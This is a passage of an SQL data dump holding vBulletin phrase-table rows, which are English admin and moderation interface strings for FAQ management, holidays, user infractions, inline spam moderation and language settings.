{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (36065, -1, 'download_upload_adminhelp', 'help_faq', 'Download / Upload Admin Help', 'vbulletin', '', 0, ''), (36066, -1, 'edit_topics', 'help_faq', 'Edit Topics', 'vbulletin', '', 0, ''), (36067, -1, 'faq_link_name_changed', 'help_faq', 'FAQ Link Name Changed', 'vbulletin', '', 0, ''), (36068, -1, 'faq_manager', 'help_faq', 'FAQ Manager', 'vbulletin', '', 0, ''), (36069, -1, 'general_topics', 'help_faq', 'General Topics', 'vbulletin', '', 0, ''), (36070, -1, 'import_admin_help_xml_file', 'help_faq', 'Import Admin Help XML File', 'vbulletin', '', 0, ''), (36071, -1, 'imported_admin_help_successfully', 'help_faq', 'Imported Admin Help Successfully', 'vbulletin', '', 0, ''), (36072, -1, 'importing_admin_help', 'help_faq', 'Importing Admin Help', 'vbulletin', '', 0, ''), (36073, -1, 'no_parent_faq_item', 'help_faq', 'No Parent FAQ Item', 'vbulletin', '', 0, ''), (36074, -1, 'parent_faq_item', 'help_faq', 'Parent FAQ Item', 'vbulletin', '', 0, ''), (36075, -1, 'quick_help_topic_links', 'help_faq', 'Quick Help Topic Links', 'vbulletin', '', 0, ''), (36076, -1, 'show_child_faq_entries', 'help_faq', 'Show Child FAQ Entries', 'vbulletin', '', 0, ''), (36077, -1, 'sorry_there_is_already_an_item_called', 'help_faq', 'Sorry, there is already an item called', 'vbulletin', '', 0, ''), (36078, -1, 'to_maintain_compatibility_with_the_system_name_changed', 'help_faq', 'To maintain compatibility with the system, your specified link name:
{1}
has been replaced with the following:
{2}
You may edit the replacement link name below.', 'vbulletin', '', 0, ''), (36079, -1, 'topic', 'help_faq', 'Topic', 'vbulletin', '', 0, ''), (36080, -1, 'topic_manager', 'help_faq', 'Topic Manager', 'vbulletin', '', 0, ''), (36081, -1, 'ash_wednesday', 'holiday', 'Ash Wednesday', 'vbulletin', '', 0, ''), (36082, -1, 'ash_wednesday_desc', 'holiday', 'Ash Wednesday Holiday', 'vbulletin', '', 0, ''), (36083, -1, 'corpus_christi', 'holiday', 'Corpus Christi', 'vbulletin', '', 0, ''), (36084, -1, 'corpus_christi_desc', 'holiday', 'Corpus Christi Holiday', 'vbulletin', '', 0, ''), (36085, -1, 'easter', 'holiday', 'Easter', 'vbulletin', '', 0, ''), (36086, -1, 'easter_desc', 'holiday', 'Easter Holiday', 'vbulletin', '', 0, ''), (36087, -1, 'event_x_to_y', 'holiday', '{1} to {2}', 'vbulletin', '', 0, ''), (36088, -1, 'good_friday', 'holiday', 'Good Friday', 'vbulletin', '', 0, ''), (36089, -1, 'good_friday_desc', 'holiday', 'Good Friday Holiday', 'vbulletin', '', 0, ''), (36090, -1, 'holidays', 'holiday', 'Holidays', 'vbulletin', '', 0, ''), (36091, -1, 'mardi_gras', 'holiday', 'Mardi Gras', 'vbulletin', '', 0, ''), (36092, -1, 'mardi_gras_desc', 'holiday', 'Mardi Gras Holiday', 'vbulletin', '', 0, ''), (36093, -1, 'palm_sunday', 'holiday', 'Palm Sunday', 'vbulletin', '', 0, ''), (36094, -1, 'palm_sunday_desc', 'holiday', 'Palm Sunday Holiday', 'vbulletin', '', 0, ''), (36095, -1, 'pentecost', 'holiday', 'Pentecost', 'vbulletin', '', 0, ''), (36096, -1, 'pentecost_desc', 'holiday', 'Pentecost Holiday', 'vbulletin', '', 0, ''), (36097, -1, 'active', 'infraction', 'Active', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36098, -1, 'active_infraction_x_points', 'infraction', 'Active Infraction (Points: {1})', 'vbulletin', 'vBulletin Solutions', 1212055642, '3.7.2'), (36099, -1, 'active_warning', 'infraction', 'Active Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36100, -1, 'add_new_automatic_ban', 'infraction', 'Add New Automatic Ban', 'vbulletin', 'vBulletin Solutions', 1157390518, '3.6.1'), (36101, -1, 'add_new_user_infraction_group', 'infraction', 'Add New User Infraction Group', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36102, -1, 'administrative_note', 'infraction', 'Administrative Note', 'vbulletin', 'vBulletin Solutions', 1158273743, '3.6.2'), (36103, -1, 'amount', 'infraction', 'Amount', 'vbulletin', 'vBulletin Solutions', 1157406198, '3.6.1'), (36104, -1, 'are_you_sure_want_to_delete_infraction_x', 'infraction', 'Are you sure you want to delete Infraction {1}?', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36105, -1, 'are_you_sure_you_want_to_delete_this_automatic_ban', 'infraction', 'Are you sure you want to delete this automatic ban?', 'vbulletin', 'vBulletin Solutions', 1157411113, '3.6.1'), (36106, -1, 'are_you_sure_you_want_to_delete_this_infraction_group', 'infraction', 'Are you sure you want to delete this infraction group?', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36107, -1, 'are_you_sure_you_want_to_delete_this_infraction_level', 'infraction', 'Are you sure you want to delete this infraction level?', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36108, -1, 'automatic_ban', 'infraction', 'Automatic Ban', 'vbulletin', 'vBulletin Solutions', 1157390535, '3.6.1'), (36109, -1, 'automatic_bans', 'infraction', 'Automatic Bans', 'vbulletin', 'vBulletin Solutions', 1157397367, '3.6.1'), (36110, -1, 'ban_usergroup', 'infraction', 'Ban Usergroup', 'vbulletin', 'vBulletin Solutions', 1157474207, '3.6.1'), (36111, -1, 'current_infraction_groups', 'infraction', 'Current Infraction Groups', 'vbulletin', 'vBulletin Solutions', 1153936508, '3.6.0 Release Candidate 3'), (36112, -1, 'custom_infraction', 'infraction', 'Custom Infraction', 'vbulletin', 'vBulletin Solutions', 1149887781, '3.6.0 Beta 2'), (36113, -1, 'discussion_thread', 'infraction', 'Discussion Thread', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36114, -1, 'expired', 'infraction', 'Expired', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36115, -1, 'expired_infraction_x_points', 'infraction', 'Expired Infraction (Points: {1})', 'vbulletin', 'vBulletin Solutions', 1212055652, '3.7.2'), (36116, -1, 'expired_warning', 'infraction', 'Expired Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36117, -1, 'expires', 'infraction', 'Expires', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36118, -1, 'extend', 'infraction', 'Extend', 'vbulletin', 'vBulletin Solutions', 1155926596, '3.6.1'), (36119, -1, 'give_infraction', 'infraction', 'Give Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36120, -1, 'infraction', 'infraction', 'Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36121, -1, 'infraction_group', 'infraction', 'Infraction Group', 'vbulletin', 'vBulletin Solutions', 1157411315, '3.6.1'), (36122, -1, 'infraction_level', 'infraction', 'Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36123, -1, 'infraction_reason', 'infraction', 'Infraction Reason', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36124, -1, 'infraction_received', 'infraction', 'Infraction Received: {1}', 'vbulletin', 'vBulletin Solutions', 1149109875, '3.6.0 Beta 1'), (36125, -1, 'infraction_statistics', 'infraction', 'Infraction Statistics', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36126, -1, 'infraction_type', 'infraction', 'Type', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36127, -1, 'infraction_view', 'infraction', 'View', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36128, -1, 'infraction_viewer_page_x_y_there_are_z_total_log_entries', 'infraction', 'Infraction Viewer (page {1}/{2}) | There are {3} total entries.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36129, -1, 'infraction_x_y', 'infraction', 'Infraction for {1}: {2}', 'vbulletin', 'vBulletin Solutions', 1149101904, '3.6.0 Beta 1'), (36130, -1, 'infractions_active_total', 'infraction', 'Infractions (Active / Total)', 'vbulletin', 'vBulletin Solutions', 1157484897, '3.6.1'), (36131, -1, 'left_by', 'infraction', 'Left By', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36132, -1, 'leftby_infraction', 'infraction', 'Left By', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36133, -1, 'leftfor_infraction', 'infraction', 'Left For', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36134, -1, 'message_to_user', 'infraction', 'Message to User', 'vbulletin', 'vBulletin Solutions', 1158273723, '3.6.2'), (36135, -1, 'method', 'infraction', 'Method', 'vbulletin', 'vBulletin Solutions', 1157406209, '3.6.1'), (36136, -1, 'no_title', 'infraction', '<No Title>', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36137, -1, 'order_by_expiration', 'infraction', 'Order by Expiration', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36138, -1, 'order_by_points', 'infraction', 'Order by Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36139, -1, 'override_display', 'infraction', 'Override Display', 'vbulletin', 'vBulletin Solutions', 1153845761, '3.6.0 Release Candidate 3'), (36140, -1, 'override_usergroup', 'infraction', 'Override Usergroup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36141, -1, 'override_with_permissions', 'infraction', 'Override with Permissions from Usergroup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36142, -1, 'points', 'infraction', 'Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36143, -1, 'possible_infraction_groups', 'infraction', 'Possible Infraction Groups', 'vbulletin', 'vBulletin Solutions', 1150196731, '3.6.0 Beta 2'), (36144, -1, 'removal_of_this_infraction', 'infraction', 'Removal of this infraction will remove the infraction points that were incurred for this offense and decrease the user\'s infractions/warnings total.', 'vbulletin', 'vBulletin Solutions', 1154953668, '3.6.1'), (36145, -1, 'reversal_reason', 'infraction', 'Reversal Reason', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36146, -1, 'reverse', 'infraction', 'Reverse', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36147, -1, 'reverse_infraction', 'infraction', 'Reverse Infraction/Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36148, -1, 'reverse_this_infraction', 'infraction', 'Reverse this Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36149, -1, 'reverse_this_warning', 'infraction', 'Reverse this Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36150, -1, 'reversed', 'infraction', 'Reversed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36151, -1, 'reversed_infraction_x_points', 'infraction', 'Reversed Infraction (Points: {1})', 'vbulletin', 'vBulletin Solutions', 1212055665, '3.7.2'), (36152, -1, 'reversed_warning', 'infraction', 'Reversed Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36153, -1, 'status', 'infraction', 'Status', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36154, -1, 'to_reverse_this_infraction', 'infraction', 'To reverse this warning/infraction, click this box and press the \'Reverse\' button.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36155, -1, 'user_infraction', 'infraction', 'User Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36156, -1, 'user_infraction_for_x', 'infraction', 'User Infraction for {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36157, -1, 'user_infraction_groups', 'infraction', 'User Infraction Groups', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36158, -1, 'user_infraction_level', 'infraction', 'User Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36159, -1, 'user_infraction_levels', 'infraction', 'User Infraction Levels', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36160, -1, 'user_infraction_manager', 'infraction', 'User Infraction Manager', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36161, -1, 'view_infraction', 'infraction', 'View Infraction/Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36162, -1, 'view_infractions', 'infraction', 'View Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36163, -1, 'warning', 'infraction', 'Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36164, -1, 'warning_only', 'infraction', 'Warning Only', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36165, -1, 'warning_received', 'infraction', 'Warning Received: {1}', 'vbulletin', 'vBulletin Solutions', 1149109883, '3.6.0 Beta 1'), (36166, -1, 'warning_x_y', 'infraction', 'Warning for {1}: {2}', 'vbulletin', 'vBulletin Solutions', 1149101914, '3.6.0 Beta 1'), (36167, -1, 'warnings', 'infraction', 'Warnings', 'vbulletin', 'vBulletin Solutions', 1149805562, '3.6.0 Beta 2'), (36168, -1, 'x_days', 'infraction', '{1} Day(s)', 'vbulletin', 'vBulletin Solutions', 1157409423, '3.6.1'), (36169, -1, 'x_hours', 'infraction', '{1} Hour(s)', 'vbulletin', 'vBulletin Solutions', 1157409433, '3.6.1'), (36170, -1, 'x_months', 'infraction', '{1} Month(s)', 'vbulletin', 'vBulletin Solutions', 1157409416, '3.6.1'), (36171, -1, 'x_weeks', 'infraction', '{1} Week(s)', 'vbulletin', 'vBulletin Solutions', 1157409407, '3.6.1'), (36172, -1, 'x_y_points', 'infraction', '{1} - {2} Point(s)', 'vbulletin', 'vBulletin Solutions', 1150140161, '3.6.0 Beta 2'), (36173, -1, 'x_years', 'infraction', '{1} Year(s)', 'vbulletin', 'vBulletin Solutions', 1157409400, '3.6.1'), (36174, -1, 'affected_ips', 'inlinemod', 'Affected IP Addresses', 'vbulletin', 'vBulletin Solutions', 1190301644, '3.7.0 Beta 1'), (36175, -1, 'affected_ips_are', 'inlinemod', 'The IP addresses used to post the spam are:', 'vbulletin', 'vBulletin Solutions', 1190301574, '3.7.0 Beta 1'), (36176, -1, 'affected_users', 'inlinemod', 'Affected Users', 'vbulletin', 'vBulletin Solutions', 1190298826, '3.7.0 Beta 1'), (36177, -1, 'affected_users_are', 'inlinemod', 'The user(s) who posted the spam are:', 'vbulletin', 'vBulletin Solutions', 1190301653, '3.7.0 Beta 1'), (36178, -1, 'apply_selected_action_to_other_users_sharing_ips', 'inlinemod', 'Apply the selected action to other users registered with or posting from the affected IP addresses', 'vbulletin', 'vBulletin Solutions', 1190369794, '3.7.0 Beta 1'), (36179, -1, 'applying_punitive_action_to', 'inlinemod', 'Applying Punitive Action To', 'vbulletin', 'vBulletin Solutions', 1192466961, '3.7.0 Beta 1'), (36180, -1, 'approve_attachments', 'inlinemod', 'Approve Attachments', 'vbulletin', '', 0, ''), (36181, -1, 'approve_pictures', 'inlinemod', 'Approve Pictures', 'vbulletin', 'vBulletin Solutions', 1203712911, '3.7.0 Beta 6'), (36182, -1, 'approve_posts', 'inlinemod', 'Approve Posts', 'vbulletin', '', 0, ''), (36183, -1, 'approve_threads', 'inlinemod', 'Approve Threads', 'vbulletin', '', 0, ''), (36184, -1, 'asterisk_items_require_further_confirmation', 'inlinemod', 'Options marked with an asterisk (*) will cause a further confirmation page to be loaded before any action is taken.', 'vbulletin', 'vBulletin Solutions', 1190293353, '3.7.0 Beta 1'), (36185, -1, 'ban_spam_ips', 'inlinemod', 'Ban the IP addresses used to post this spam', 'vbulletin', 'vBulletin Solutions', 1190293245, '3.7.0 Beta 1'), (36186, -1, 'ban_users', 'inlinemod', 'Ban these users', 'vbulletin', 'vBulletin Solutions', 1190293002, '3.7.0 Beta 1'), (36187, -1, 'clear_post_list', 'inlinemod', 'Deselect All Posts', 'vbulletin', '', 0, ''), (36188, -1, 'clear_thread_list', 'inlinemod', 'Deselect All Threads', 'vbulletin', '', 0, ''), (36189, -1, 'close_threads', 'inlinemod', 'Close Threads', 'vbulletin', '', 0, ''), (36190, -1, 'copy_posts', 'inlinemod', 'Copy Posts', 'vbulletin', 'vBulletin Solutions', 1145563688, '3.6.0 Beta 1'), (36191, -1, 'delete_discussions', 'inlinemod', 'Delete Discussions', 'vbulletin', 'vBulletin Solutions', 1212060899, '3.7.1'), (36192, -1, 'delete_messages', 'inlinemod', 'Delete Messages', 'vbulletin', 'vBulletin Solutions', 1197984045, '3.7.0 Beta 3'), (36193, -1, 'delete_other_posts_and_threads_by_affected_users', 'inlinemod', 'Delete other posts and threads started by the affected users', 'vbulletin', 'vBulletin Solutions', 1190385213, '3.7.0 Beta 1'), (36194, -1, 'delete_pictures', 'inlinemod', 'Delete Pictures', 'vbulletin', 'vBulletin Solutions', 1203712901, '3.7.0 Beta 6'), (36195, -1, 'delete_posts_as_spam', 'inlinemod', 'Delete Posts as Spam', 'vbulletin', 'vBulletin Solutions', 1190119722, '3.7.0 Beta 1'), (36196, -1, 'delete_spam', 'inlinemod', 'Delete Spam', 'vbulletin', 'vBulletin Solutions', 1190293750, '3.7.0 Beta 1'), (36197, -1, 'delete_threads', 'inlinemod', 'Delete Threads', 'vbulletin', '', 0, ''), (36198, -1, 'delete_threads_as_spam', 'inlinemod', 'Delete Threads as Spam', 'vbulletin', 'vBulletin Solutions', 1190119750, '3.7.0 Beta 1'), (36199, -1, 'deleting_the_first_message', 'inlinemod', 'Deleting the first message in a discussion will delete the discussion.', 'vbulletin', 'vBulletin Solutions', 1212063182, '3.7.1'), (36200, -1, 'deleting_the_first_post', 'inlinemod', 'Deleting the first post of a thread will result in the deletion of the thread.', 'vbulletin', 'vBulletin Solutions', 1149865862, '3.6.0 Beta 2'), (36201, -1, 'deleting_x_discussions_from_y_social_groups', 'inlinemod', 'Deleting {1} discussions from {2} social group(s).', 'vbulletin', 'vBulletin Solutions', 1212061573, '3.7.1'), (36202, -1, 'deleting_x_messages_from_y_pictures', 'inlinemod', 'Deleting {1} message(s) from {2} picture(s).', 'vbulletin', 'vBulletin Solutions', 1200331529, '3.7.0 Beta 4'), (36203, -1, 'deleting_x_messages_from_y_user_profiles', 'inlinemod', 'Deleting {1} message(s) from {2} user profile(s).', 'vbulletin', 'vBulletin Solutions', 1191278998, '3.7.0 Beta 1'), (36204, -1, 'deleting_x_messages_in_y_discussions_from_z_social_groups', 'inlinemod', 'Deleting {1} message(s) in {2} discussion(s) from {3} social group(s).', 'vbulletin', 'vBulletin Solutions', 1212061609, '3.7.1'), (36205, -1, 'deleting_x_pictures_from_y_albums', 'inlinemod', 'Deleting {1} picture(s) from {2} album(s)', 'vbulletin', 'vBulletin Solutions', 1203724459, '3.7.0 Beta 6'), (36206, -1, 'deselect_all', 'inlinemod', 'Deselect All', 'vbulletin', '', 0, ''), (36207, -1, 'deselect_all_pictures', 'inlinemod', 'Deselect All Pictures', 'vbulletin', 'vBulletin Solutions', 1203715889, '3.7.0 Beta 6'), (36208, -1, 'do_nothing', 'inlinemod', 'Do nothing', 'vbulletin', 'vBulletin Solutions', 1190293301, '3.7.0 Beta 1'), (36209, -1, 'do_what_with_affected_users', 'inlinemod', 'What do you want to do to the {1} affected user(s)?', 'vbulletin', 'vBulletin Solutions', 1190301443, '3.7.0 Beta 1'), (36210, -1, 'from_this_page', 'inlinemod', 'From This Page...', 'vbulletin', '', 0, ''), (36211, -1, 'give_users_infraction', 'inlinemod', 'Give these users an infraction', 'vbulletin', 'vBulletin Solutions', 1190293120, '3.7.0 Beta 1'), (36212, -1, 'invert_selection', 'inlinemod', 'Invert Selection', 'vbulletin', '', 0, ''), (36213, -1, 'merge_posts', 'inlinemod', 'Merge Posts', 'vbulletin', '', 0, ''), (36214, -1, 'merge_threads', 'inlinemod', 'Merge Threads', 'vbulletin', '', 0, ''), (36215, -1, 'moderated_thread_prefix', 'inlinemod', 'Moderated:', 'vbulletin', '', 0, ''), (36216, -1, 'moderation', 'inlinemod', 'Moderation', 'vbulletin', '', 0, ''), (36217, -1, 'move_posts', 'inlinemod', 'Move Posts', 'vbulletin', '', 0, ''), (36218, -1, 'move_threads', 'inlinemod', 'Move Threads', 'vbulletin', '', 0, ''), (36219, -1, 'no_punitive_action_users_are_guests', 'inlinemod', 'All selected users are guests, therefore no punitive actions can be applied.', 'vbulletin', 'vBulletin Solutions', 1194873073, '3.7.0 Beta 1'), (36220, -1, 'only_first_post_is_spam', 'inlinemod', 'Only the first post in each thread will be treated as spam. Any subsequent posts will be deleted, but will not be marked as spam.', 'vbulletin', 'vBulletin Solutions', 1190293392, '3.7.0 Beta 1'), (36221, -1, 'open_threads', 'inlinemod', 'Open Threads', 'vbulletin', '', 0, ''), (36222, -1, 'permanently_remove_items', 'inlinemod', 'Permanently remove items', 'vbulletin', 'vBulletin Solutions', 1190301099, '3.7.0 Beta 1'), (36223, -1, 'place_ban_users_in', 'inlinemod', 'Place banned users in to', 'vbulletin', 'vBulletin Solutions', 1194524373, '3.7.0 Beta 1'), (36224, -1, 'punitive_action', 'inlinemod', 'Punitive Action', 'vbulletin', 'vBulletin Solutions', 1190291662, '3.7.0 Beta 1'), (36225, -1, 'punitive_actions_still_performed', 'inlinemod', 'All punitive actions that affected other users have still been performed.', 'vbulletin', 'vBulletin Solutions', 1199296524, '3.7.0 Beta 4'), (36226, -1, 'registered_x_posts_y', 'inlinemod', 'Registered: {1}; Posts: {2}', 'vbulletin', 'vBulletin Solutions', 1190291273, '3.7.0 Beta 1'), (36227, -1, 'save_users_from_punishment', 'inlinemod', 'You may save any of these users from punishment by removing the check next to their name', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'), (36228, -1, 'select_all', 'inlinemod', 'Select All', 'vbulletin', '', 0, ''), (36229, -1, 'select_closed_threads', 'inlinemod', 'Select Closed Threads', 'vbulletin', '', 0, ''), (36230, -1, 'select_deleted_posts', 'inlinemod', 'Select Deleted Posts', 'vbulletin', '', 0, ''), (36231, -1, 'select_deleted_threads', 'inlinemod', 'Select Deleted Threads', 'vbulletin', '', 0, ''), (36232, -1, 'select_posts_from_guests', 'inlinemod', 'Select Posts from Guests', 'vbulletin', '', 0, ''), (36233, -1, 'select_posts_with_attachments', 'inlinemod', 'Select Posts with Attachments', 'vbulletin', '', 0, ''), (36234, -1, 'select_sticky_threads', 'inlinemod', 'Select Sticky Threads', 'vbulletin', '', 0, ''), (36235, -1, 'select_threads_with_attachments', 'inlinemod', 'Select Threads with Attachments', 'vbulletin', '', 0, ''), (36236, -1, 'select_threads_with_polls', 'inlinemod', 'Select Threads with Polls', 'vbulletin', '', 0, ''), (36237, -1, 'select_unapproved_posts', 'inlinemod', 'Select Unapproved Posts', 'vbulletin', '', 0, ''), (36238, -1, 'select_unapproved_threads', 'inlinemod', 'Select Unapproved Threads', 'vbulletin', '', 0, ''), (36239, -1, 'spam_management', 'inlinemod', 'Spam Management', 'vbulletin', 'vBulletin Solutions', 1190112209, '3.6.8'), (36240, -1, 'spam_management_remove_posts_warning', 'inlinemod', 'You will remove all posts for the selected users, those with more than {1} posts will need to be removed via the admin control panel.', 'vbulletin', 'vBulletin Solutions', 1192466988, '3.7.0 Beta 1'), (36241, -1, 'stick_threads', 'inlinemod', 'Stick Threads', 'vbulletin', '', 0, ''), (36242, -1, 'submit_data_to_antispam_service', 'inlinemod', 'Submit data to Anti-Spam Service', 'vbulletin', 'vBulletin Solutions', 1194870127, '3.7.0 Beta 1'), (36243, -1, 'unapprove_attachments', 'inlinemod', 'Unapprove Attachments', 'vbulletin', '', 0, ''), (36244, -1, 'unapprove_pictures', 'inlinemod', 'Unapprove Pictures', 'vbulletin', 'vBulletin Solutions', 1219150489, '3.8.0 Alpha 1'), (36245, -1, 'unapprove_posts', 'inlinemod', 'Unapprove Posts', 'vbulletin', '', 0, ''), (36246, -1, 'unapprove_threads', 'inlinemod', 'Unapprove Threads', 'vbulletin', '', 0, ''), (36247, -1, 'undelete_posts', 'inlinemod', 'Undelete Posts', 'vbulletin', '', 0, ''), (36248, -1, 'undelete_threads', 'inlinemod', 'Undelete Threads', 'vbulletin', '', 0, ''), (36249, -1, 'unstick_threads', 'inlinemod', 'Unstick Threads', 'vbulletin', '', 0, ''), (36250, -1, 'users_too_many_post_warning', 'inlinemod', 'The following users had more than 50 posts and these posts will need to be removed via the admin control panel.', 'vbulletin', 'vBulletin Solutions', 1199367812, '3.7.0 Beta 4'), (36251, -1, 'view_selected_posts', 'inlinemod', 'View Selected Posts', 'vbulletin', 'vBulletin Solutions', 1147982193, '3.6.0 Beta 1'), (36252, -1, 'view_selected_threads', 'inlinemod', 'View Selected Threads', 'vbulletin', 'vBulletin Solutions', 1147982202, '3.6.0 Beta 1'), (36253, -1, 'x_y_by_z', 'inlinemod', '({1}) {2} by {3}', 'vbulletin', '', 0, ''), (36254, -1, 'add_new_language', 'language', 'Add New Language', 'vbulletin', '', 0, ''), (36255, -1, 'add_new_phrase', 'language', 'Add New Phrase', 'vbulletin', '', 0, ''), (36256, -1, 'all_languages', 'language', 'All Languages', 'vbulletin', '', 0, ''), (36257, -1, 'all_phrase_groups', 'language', 'ALL PHRASE GROUPS', 'vbulletin', '', 0, ''), (36258, -1, 'all_products', 'language', 'All Products', 'vbulletin', 'vBulletin Solutions', 1172078028, '3.6.5'), (36259, -1, 'are_you_sure_want_to_delete_language_x', 'language', 'Are you sure you want to delete the language called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (36260, -1, 'are_you_sure_want_to_delete_phrase_x', 'language', 'Are you sure you want to delete the phrase called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (36261, -1, 'calformat1_format_override', 'language', 'Birthday Date Format Override Use this to override the default birthday (with Year) date format', 'vbulletin', '', 0, ''), (36262, -1, 'calformat2_format_override', 'language', 'Birthday Date Format Override Use this to override the default birthday (without Year) date format
DO NOT put in a code for the year
', 'vbulletin', '', 0, ''), (36263, -1, 'case_sensitive', 'language', 'Case-Sensitive', 'vbulletin', '', 0, ''), (36264, -1, 'copy_default_text', 'language', 'Copy Default Text', 'vbulletin', '', 0, ''), (36265, -1, 'create_new_language', 'language', 'Create New Language', 'vbulletin', '', 0, ''), (36266, -1, 'creating_a_new_language_called_x', 'language', 'Creating a new language called \'{1}\'', 'vbulletin', '', 0, ''), (36267, -1, 'custom_language', 'language', 'Custom Language', 'vbulletin', '', 0, ''), (36268, -1, 'custom_phrase', 'language', 'Custom Phrase', 'vbulletin', '', 0, ''), (36269, -1, 'date_format_override', 'language', 'Date Format Override\r\nSee: http://www.php.net/manual-lookup.php?function=strftime

\r\nExamples: (if a locale is specified)
\r\nEuropean Format (e.g., 25-04-98): %d-%m-%y
\r\nDefault Date Format for this Locale: %x\r\n
', 'vbulletin', 'vBulletin Solutions', 1192528658, '3.7.0 Beta 1'), (36270, -1, 'date_time_formatting', 'language', 'Date / Time FormattingIf a locale is defined, you must use the formatting found here, otherwise use the formatting found here', 'vbulletin', '', 0, ''), (36271, -1, 'decimal_separator', 'language', 'Decimal Separator (The character used to separate integers from floating point number components, such as the . used in 0.01. To specify a space, please use the underscore _)', 'vbulletin', '', 0, ''), (36272, -1, 'default_phrase_updated_desc', 'language', 'Default Phrase Updated in {1} by {2}
\r\nYour Custom Phrase Last Edited in {3} by {4}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36273, -1, 'default_text', 'language', 'Default Text', 'vbulletin', '', 0, ''), (36274, -1, 'default_text_is_empty', 'language', 'Copying the default text would be tricky, as you haven\'t typed anything yet!', 'vbulletin', '', 0, ''), (36275, -1, 'delete_all_orphans_notes', 'language', 'You have chosen to delete all orphan phrases. Click the button below to continue.', 'vbulletin', '', 0, ''), (36276, -1, 'deleting_this_language_will_delete_custom_phrases', 'language', 'Deleting this language will delete any customized phrases you have created for this language.', 'vbulletin', '', 0, ''), (36277, -1, 'download_upload_language', 'language', 'Download / Upload Language', 'vbulletin', '', 0, ''), (36278, -1, 'edit_settings', 'language', 'Edit Settings', 'vbulletin', '', 0, ''), (36279, -1, 'edit_translate_x_y_phrases', 'language', 'Edit / Translate {1} {2} Phrases', 'vbulletin', '', 0, ''), (36280, -1, 'enable_directional_markup_fix', 'language', 'Enable Directional Markup Fix', 'vbulletin', '', 0, ''), (36281, -1, 'find_and_replace_in_languages', 'language', 'Find and Replace in Languages', 'vbulletin', '', 0, ''), (36282, -1, 'find_orphan_phrases', 'language', 'Find Orphan Phrases', 'vbulletin', '', 0, ''), (36283, -1, 'find_updated_phrases', 'language', 'Find Updated Phrases', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36284, -1, 'general_settings', 'language', 'General Settings', 'vbulletin', '', 0, ''), (36285, -1, 'html_charset', 'language', 'HTML Character Set\r\nThis is the value of the \'charset\' attribute for the HTML content type setting in the \'headinclude\' template.', 'vbulletin', '', 0, ''), (36286, -1, 'if_you_delete_this_phrase_translations_will_be_deleted', 'language', 'If you choose to delete this phrase, you will also 